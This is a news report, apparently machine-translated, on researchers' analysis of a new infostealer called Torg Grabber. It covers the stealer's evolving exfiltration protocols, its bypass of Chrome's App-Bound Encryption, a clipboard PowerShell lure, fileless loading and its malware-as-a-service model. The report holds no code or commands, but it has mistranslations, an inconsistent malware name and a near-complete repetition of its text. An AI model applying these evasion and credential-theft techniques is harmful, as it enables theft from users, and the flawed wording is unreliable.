Hackers created a new malware from scratch – and the researchers observed every day of its evolution.
In the sample of malware, which was first mistaken for the famous Vidar infosiler, found a completely different story. Behind the substitution was a new data theft tool, called Tog Grabber. For 3 months, the researchers collected 334 samples and tracked how primitive workpiece quickly turned into a full-fledged criminal service with its own infrastructure, control panel and dozens of operators.
The first thing that alerted analysts is the discrepancy with basic signs. The binary file weighed about 747 kilobytes, was assembled as a 64-bit executable module using MinG/GCC and used another control protocol. Vidar has different structure and tools. Inside, a debugging marker of grabber v1.0 was found, and the network interaction was built through the REST API with ChaChha20 encryption and authentication HMAC-SHA256. Comparison with other stylers like StealC also did not match. In the end, it became clear: we are talking about a new development.
The evolution of the Torg Grabber is almost shown. At an early stage, the malware acted as simple as possible. The data was collected, archived in ZIP and sent to closed Telegram channels through the Bot API. There was no encryption on top of the standard TLS, and when downloading the download crash, the program could send information in an open form with a text message. This scheme required minimal costs, but was easily detected and quickly blocked.
After a few days, the developers tried a different approach – their own binary protocol on top of TCP. The program opened a connection with a remote server and transmitted data in encrypted form using Chacha20-Poly1305. Packages were broken down into blocks of 64 kilobytes, integrity check was added through the SHA-256. The solution looked technically neat, but it turned out to be too difficult to scale. The idea was abandoned after 4 assemblies.
Then the main phase began. The malware switched to the REST API on top of HTTPS and received a full-fledged server part. When starting, the Torg Grabber is registered on the control server via a request to /api/auth, transmits the system imprint - a video card, hardware identifier, an antivirus list - and receives a configuration. Then the transfer of stolen data in parts begins, with the authentication of each request. Traffic often passes through Cloudflare, which makes the blocking more difficult.
Functionality grew rapidly. The size of the binary file almost doubled, additional modules appeared. One of the key components is DLL to bypass the Application Bound Encryption, which Google has implemented in Chrome since version 127. This mechanism binds encryption keys to the browser process itself to protect credentials. Torg Grabber solves the problem through the introduction of code in memory and access to the COM interfaces of the Elevation Service, receiving the master key and decrypting the storerooms of passwords, cookies and other data.
The process of infection is built as a chain of several stages. First, the user encounters a bait: fake cheats for games, hacked software or a fake notification page. One of the common scenarios is an attack through a clipboard. The malware page copies the PowerShell-team and offers to insert it manually. After launch, the team loads the next step through the Background Intelligent Transfer Service - a regular Windows mechanism that rarely causes suspicion.
Next, the bootloader is launched, which is disguised as the installer or update. It unpacks additional components, applies several levels of encryption and obfuscation and gradually deploys the main module into memory. The malicious code does not record the final executable file on the disk, but uploads it directly into the RAM. This approach makes it difficult to detect classical means.
After activation, Torg Grabber collects data from a wide range of sources. The list includes 25 browsers based on Chromium, 8 versions of Firefox, about 850 extensions, as well as Discord, Steam, Telegram, VPN clients, FTP-accessibles, mail clients and crypto wallets. The program can take screenshots, collect files from the desktop and from documents, and if necessary, download and execute additional code from the control server.
Of particular interest is the distribution architecture. The same binary file is used by different operators. Settings are transmitted through the variables of the environments that are set at the stage of infection. This approach allows you not to reassemble the malware for each client. In fact, we are talking about the model Malware-as-a-ServiceMalware-as-a-Service, where the developer provides the tool, and operators use it for their tasks.
Analysis of binary files allowed to select more than 40 operators identifiers. Among them are pseudonyms, assembly dates and numerical IDs that coincide with accounts in Telegram. Through these identifiers, the control panel distributes notifications about the data received. Some of the accounts were associated with the Russian-language cybercrime environment.
The infrastructure of the campaign is also divided into roles. Some domains are responsible for the delivery of downloaders, others - for the operation of the control server. This scheme increases stability: blocking one segment does not stop the entire operation. Servers are registered for a short time, use free certificates and often change.
As a result, the Torg Grabber shows a typical trend for recent years. Malicious software is developed not as a single tool, but as a service with a fast-cycle update cycle, a modular architecture and a distributed infrastructure. In a few months, the project has gone from a simple prototype based on Telegram to a complex system that combines advanced cryptography, bypassing browser protections and a scalable distribution model.
In the sample of malware, which was first mistaken for the famous Vidar infosiler, found a completely different story. Behind the substitution was a new data theft tool, called Tog Grabber. For 3 months, the researchers collected 334 samples and tracked how primitive workpiece quickly turned into a full-fledged criminal service with its own infrastructure, control panel and dozens of operators.
The first thing that alerted analysts is the discrepancy with basic signs. The binary file weighed about 747 kilobytes, was assembled as a 64-bit executable module using MinG/GCC and used another control protocol. Vidar has different structure and tools. Inside, a debugging marker of grabber v1.0 was found, and the network interaction was built through the REST API with ChaChha20 encryption and authentication HMAC-SHA256. Comparison with other stylers like StealC also did not match. In the end, it became clear: we are talking about a new development.
The evolution of the Torg Grabber is almost shown. At an early stage, the malware acted as simple as possible. The data was collected, archived in ZIP and sent to closed Telegram channels through the Bot API. There was no encryption on top of the standard TLS, and when downloading the download crash, the program could send information in an open form with a text message. This scheme required minimal costs, but was easily detected and quickly blocked.
After a few days, the developers tried a different approach – their own binary protocol on top of TCP. The program opened a connection with a remote server and transmitted data in encrypted form using Chacha20-Poly1305. Packages were broken down into blocks of 64 kilobytes, integrity check was added through the SHA-256. The solution looked technically neat, but it turned out to be too difficult to scale. The idea was abandoned after 4 assemblies.
Then the main phase began. The malware switched to the REST API on top of HTTPS and received a full-fledged server part. When starting, the Torg Grabber is registered on the control server via a request to /api/auth, transmits the system imprint - a video card, hardware identifier, an antivirus list - and receives a configuration. Then the transfer of stolen data in parts begins, with the authentication of each request. Traffic often passes through Cloudflare, which makes the blocking more difficult.
Functionality grew rapidly. The size of the binary file almost doubled, additional modules appeared. One of the key components is DLL to bypass the Application Bound Encryption, which Google has implemented in Chrome since version 127. This mechanism binds encryption keys to the browser process itself to protect credentials. Torg Grabber solves the problem through the introduction of code in memory and access to the COM interfaces of the Elevation Service, receiving the master key and decrypting the storerooms of passwords, cookies and other data.
The process of infection is built as a chain of several stages. First, the user encounters a bait: fake cheats for games, hacked software or a fake notification page. One of the common scenarios is an attack through a clipboard. The malware page copies the PowerShell-team and offers to insert it manually. After launch, the team loads the next step through the Background Intelligent Transfer Service - a regular Windows mechanism that rarely causes suspicion.
Next, the bootloader is launched, which is disguised as the installer or update. It unpacks additional components, applies several levels of encryption and obfuscation and gradually deploys the main module into memory. The malicious code does not record the final executable file on the disk, but uploads it directly into the RAM. This approach makes it difficult to detect classical means.
After activation, Torg Grabber collects data from a wide range of sources. The list includes 25 browsers based on Chromium, 8 versions of Firefox, about 850 extensions, as well as Discord, Steam, Telegram, VPN clients, FTP-accessibles, mail clients and crypto wallets. The program can take screenshots, collect files from the desktop and from documents, and if necessary, download and execute additional code from the control server.
Of particular interest is the distribution architecture. The same binary file is used by different operators. Settings are transmitted through the variables of the environments that are set at the stage of infection. This approach allows you not to reassemble the malware for each client. In fact, we are talking about the model Malware-as-a-ServiceMalware-as-a-Service, where the developer provides the tool, and operators use it for their tasks.
Analysis of binary files allowed to select more than 40 operators identifiers. Among them are pseudonyms, assembly dates and numerical IDs that coincide with accounts in Telegram. Through these identifiers, the control panel distributes notifications about the data received. Some of the accounts were associated with the Russian-language cybercrime environment.
The infrastructure of the campaign is also divided into roles. Some domains are responsible for the delivery of downloaders, others - for the operation of the control server. This scheme increases stability: blocking one segment does not stop the entire operation. Servers are registered for a short time, use free certificates and often change.
As a result, the Torg Grabber shows a typical trend for recent years. Malicious software is developed not as a single tool, but as a service with a fast-cycle update cycle, a modular architecture and a distributed infrastructure. In a few months, the project has gone from a simple prototype based on Telegram to a complex system that combines advanced cryptography, bypassing browser protections and a scalable distribution model.
